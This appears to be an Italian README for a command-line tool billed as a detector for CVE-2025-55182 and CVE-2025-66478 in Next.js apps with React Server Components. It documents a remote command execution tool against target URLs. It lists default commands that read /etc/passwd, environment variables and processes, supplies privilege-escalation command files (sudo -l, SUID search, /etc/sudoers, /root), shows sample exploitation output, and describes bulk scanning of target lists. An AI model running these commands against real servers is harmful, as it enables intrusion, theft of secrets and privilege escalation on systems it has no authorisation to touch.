
Uno strumento da riga di comando per rilevare CVE-2025-55182 e CVE-2025-66478 nelle applicazioni Next.js che utilizzano React Server Components.
Uno strumento da riga di comando per rilevare CVE-2025-55182 e CVE-2025-66478 in applicazioni Next.js che utilizzano React Server Components.
wget -q -O /usr/bin/CVE-2025-55182 https://raw.githubusercontent.com/rix4uni/CVE-2025-55182/refs/heads/main/CVE-2025-55182 && chmod +x /usr/bin/CVE-2025-55182
wget -q -O /usr/bin/reportgenerator https://raw.githubusercontent.com/rix4uni/CVE-2025-55182/refs/heads/main/reportgenerator && chmod +x /usr/bin/reportgenerator
CVE-2025-55182 -d https://example.com
Nota: se non viene fornita alcuna opzione di comando, vengono eseguiti i comandi predefiniti.
Lo strumento esegue questi comandi per impostazione predefinita:
cat /etc/os-release - Informazioni sul sistema operativowhoami - Utente correntepwd - Directory di lavoro correnteid - ID utente e gruppiuname -a - Informazioni sul sistemahostname -I - Interfacce di retels -la - Elenco dei file della directorycat /etc/passwd - Account utenteenv - Variabili d'ambienteps aux - Processi in esecuzioneLo strumento reportgenerator genera automaticamente report professionali di divulgazione delle vulnerabilità a partire dai risultati delle scansioni.
# Create a file with target domains
echo -e "https://target1.com\nhttps://target2.com" > subs.txt
# Run report generator
reportgenerator
| Flag | Descrizione | Predefinito |
|---|---|---|
--file | File di input contenente i domini di destinazione | subs.txt |
--user | Nome del ricercatore per la sezione di divulgazione | Bhagirath Saxena |
# Use default settings (subs.txt, Bhagirath Saxena)
reportgenerator
# Use custom target file
reportgenerator --file targets.txt
# Use custom researcher name
reportgenerator --user "John Doe"
# Use both custom options
reportgenerator --file my-targets.txt --user "Jane Smith"
I report vengono generati in due directory:
textfile/ - Output grezzo della scansione (numerato: 1.txt, 2.txt, ecc.)mdfile/ - Report Markdown professionali (numerati: 1.md, 2.md, ecc.)Nota: la funzione di numerazione automatica garantisce che i report esistenti non vengano mai sovrascritti. Le nuove scansioni continuano dal numero esistente più alto.
Ogni report generato include:
▼ 🎯 TARGET: https://vulnerable-app.com
▼ 📋 COMMANDS TO RUN: 10
• cat /etc/os-release
• whoami
• pwd
• id
• uname -a
• hostname -I
• ls -la
• cat /etc/passwd
• env
• ps aux
[1/10] Executing: cat /etc/os-release
▼ 💻 OS INFORMATION
║ NAME="Ubuntu"
║ VERSION="22.04.3 LTS (Jammy Jellyfish)"
║ ID=ubuntu
║ ID_LIKE=debian
║ PRETTY_NAME="Ubuntu 22.04.3 LTS"
║ ...
[2/10] Executing: whoami
▼ 👤 CURRENT USER
║ www-data
...
[3/10] Executing: pwd
▼ 📂 CURRENT DIRECTORY
║ /var/www/html
...
[6/10] Executing: hostname -I
╔════════════════════════════════════════════════════════════╗
║ Command failed: hostname -I
║ This command might not be available or the server rejected it
╚════════════════════════════════════════════════════════════╝
[!] Trying alternative network command...
▼ 🌐 NETWORK INTERFACES (alternative)
║ 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
║ link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
║ inet 127.0.0.1/8 scope host lo
║ valid_lft forever preferred_lft forever
...
commands/:Crea file di comandi di esempio per diversi scenari:
# commands/basic-recon.txt
whoami
id
uname -a
cat /etc/os-release
hostname
# commands/network-recon.txt
ifconfig
netstat -tulpn
iptables -L
cat /etc/hosts
cat /etc/resolv.conf
# commands/privilege-escalation.txt
sudo -l
find / -perm -4000 2>/dev/null
cat /etc/sudoers
ls -la /root/
| Opzione | Descrizione | Predefinito |
|---|
-d, --domain | URL di destinazione (aggiunge automaticamente https:// se non è presente alcun protocollo) | http://localhost:3000 |
-c, --command | Singolo comando da eseguire | - |
-m, --multiple | Più comandi separati da punto e virgola | - |
-f, --file | File contenente i comandi (uno per riga) | - |
-h, --help | Mostra il messaggio di aiuto | - |